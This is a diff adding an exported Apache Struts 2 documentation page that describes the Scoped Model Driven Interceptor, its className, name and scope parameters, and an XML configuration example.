+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Scoped Model Driven Interceptor</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=26355">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=26355">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=26355">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=26355">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=26355">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=26355">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent">
+<p>An interceptor that enables scoped model-driven actions.</p>
+
+<p></p><p></p>This interceptor only activates on actions that implement the ScopedModelDriven interface.  If
+detected, it will retrieve the model class from the configured scope, then provide it to the Action.
+
+
+<h2><a shape="rect" name="ScopedModelDrivenInterceptor-Parameters"></a>Parameters</h2>
+
+
+<p></p><ul></ul><p></p><ul><li>className - The model class name.  Defaults to the class name of the object returned by the getModel() method.</li></ul><p></p><ul><li>name - The key to use when storing or retrieving the instance in a scope.  Defaults to the model
+           class name.</li></ul><p></p><ul><li>scope - The scope to store and retrieve the model.  Defaults to 'request' but can also be 'session'.</li></ul>
+
+
+<h2><a shape="rect" name="ScopedModelDrivenInterceptor-ExtendingtheInterceptor"></a>Extending the Interceptor</h2>
+
+
+<p>There are no known extension points for this interceptor.</p>
+
+
+<h2><a shape="rect" name="ScopedModelDrivenInterceptor-Examples"></a>Examples</h2>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+
+&lt;-- Basic usage --&gt;
+&lt;interceptor name="scopedModelDriven" class="com.opensymphony.interceptor.ScopedModelDrivenInterceptor" /&gt;
+
+&lt;-- Using all available parameters --&gt;
+&lt;interceptor name="gangsterForm" class="com.opensymphony.interceptor.ScopedModelDrivenInterceptor"&gt;
+     &lt;param name="scope"&gt;session&lt;/param&gt;
+     &lt;param name="name"&gt;gangsterForm&lt;/param&gt;
+     &lt;param name="className"&gt;com.opensymphony.example.GangsterForm&lt;/param&gt;
+ &lt;/interceptor&gt;
+
+]]></script>
+</div></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file



Mime
View raw message